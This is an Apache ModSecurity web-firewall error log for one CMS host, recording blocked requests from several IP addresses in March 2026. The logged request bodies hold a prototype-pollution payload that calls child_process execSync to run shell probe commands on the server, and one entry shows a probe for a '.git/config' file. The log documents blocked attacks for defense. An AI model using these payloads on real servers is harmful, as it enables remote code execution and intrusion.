"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var cmd=Buffer.from('ZWNobyAkKCg0NDEyOCo0NDQ4OCkp','base64').toString();eval(\\x5c\\x22var res=process.mainModule.require('child_process').execSync(cmd,{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:re..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcNsyBa6FPxjfniwshwAAAEU"] [Tue Mar 03 03:59:12.718251 2026] [:error] [pid 21860:tid 21885] [client 172.94.9.249:47628] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPU_evpVetAt05Vh5wAAABU"] [Tue Mar 03 03:59:12.750399 2026] [:error] [pid 21861:tid 21897] [client 172.94.9.249:47886] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcNsyBa6FPxjfniwshQAAAEQ"] [Tue Mar 03 03:59:12.788318 2026] [:error] [pid 21979:tid 21985] [client 172.94.9.249:48014] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoyxwAAAMQ"] [Wed Mar 04 17:18:44.120746 2026] [:error] [pid 32699:tid 32716] [client 18.181.224.95:59220] [client 18.181.224.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aahNVInqwP8nS3Nk9jdMlQAAAA0"] [Wed Mar 04 17:18:44.341591 2026] [:error] [pid 32699:tid 32709] [client 18.181.224.95:59220] [client 18.181.224.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aahNVInqwP8nS3Nk9jdMlgAAAAY"] [Wed Mar 04 17:18:44.569058 2026] [:error] [pid 32699:tid 32722] [client 18.181.224.95:59220] [client 18.181.224.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aahNVInqwP8nS3Nk9jdMlwAAABM"] [Wed Mar 04 18:38:39.673845 2026] [:error] [pid 32700:tid 32765] [client 13.231.120.86:38392] [client 13.231.120.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aahgDzaJQkz94nR98OZipAAAAFQ"] [Wed Mar 04 18:38:39.894280 2026] [:error] [pid 32700:tid 32735] [client 13.231.120.86:38392] [client 13.231.120.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aahgDzaJQkz94nR98OZipQAAAEQ"] [Wed Mar 04 18:38:40.120330 2026] [:error] [pid 32700:tid 32732] [client 13.231.120.86:38392] [client 13.231.120.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aahgEDaJQkz94nR98OZipgAAAEI"] [Wed Mar 04 20:14:38.472559 2026] [:error] [pid 19294:tid 19310] [client 3.127.203.83:37474] [client 3.127.203.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aah2jmbPYJqr0YkBIXbnDAAAAQU"] [Wed Mar 04 20:14:38.485443 2026] [:error] [pid 19294:tid 19318] [client 3.127.203.83:37474] [client 3.127.203.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aah2jmbPYJqr0YkBIXbnDQAAAQ0"] [Wed Mar 04 20:14:38.504901 2026] [:error] [pid 19294:tid 19315] [client 3.127.203.83:37474] [client 3.127.203.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aah2jmbPYJqr0YkBIXbnDgAAAQo"] [Thu Mar 05 15:46:15.370994 2026] [:error] [pid 20323:tid 20343] [client 194.180.48.253:45362] [client 194.180.48.253] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-20239"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/.git/config"] [unique_id "aamJJx1Wzgx2RZH2uDOgtgAAANI"] [Fri Mar 06 03:49:25.617759 2026] [:error] [pid 15451:tid 15472] [client 44.248.143.116:58964] [client 44.248.143.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaoypTHc-vQPL0suTUPtFwAAAVI"] [Fri Mar 06 03:49:25.774549 2026] [:error] [pid 15451:tid 15464] [client 44.248.143.116:58964] [client 44.248.143.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaoypTHc-vQPL0suTUPtGAAAAUo"] [Fri Mar 06 03:49:25.937068 2026] [:error] [pid 15451:tid 15478] [client 44.248.143.116:58964] [client 44.248.143.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaoypTHc-vQPL0suTUPtGQAAAVg"] [Fri Mar 06 19:14:12.443156 2026] [:error] [pid 14438:tid 14648] [client 35.78.63.240:43856] [client 35.78.63.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aasLZAeN8XtnchGP78q7CgAAAQw"] [Fri Mar 06 19:14:12.663402 2026] [:error] [pid 14438:tid 14654] [client 35.78.63.240:43856] [client 35.78.63.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aasLZAeN8XtnchGP78q7DQAAARI"] [Fri Mar 06 19:14:12.889362 2026] [:error] [pid 14438:tid 14639] [client 35.78.63.240:43856] [client 35.78.63.240] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] 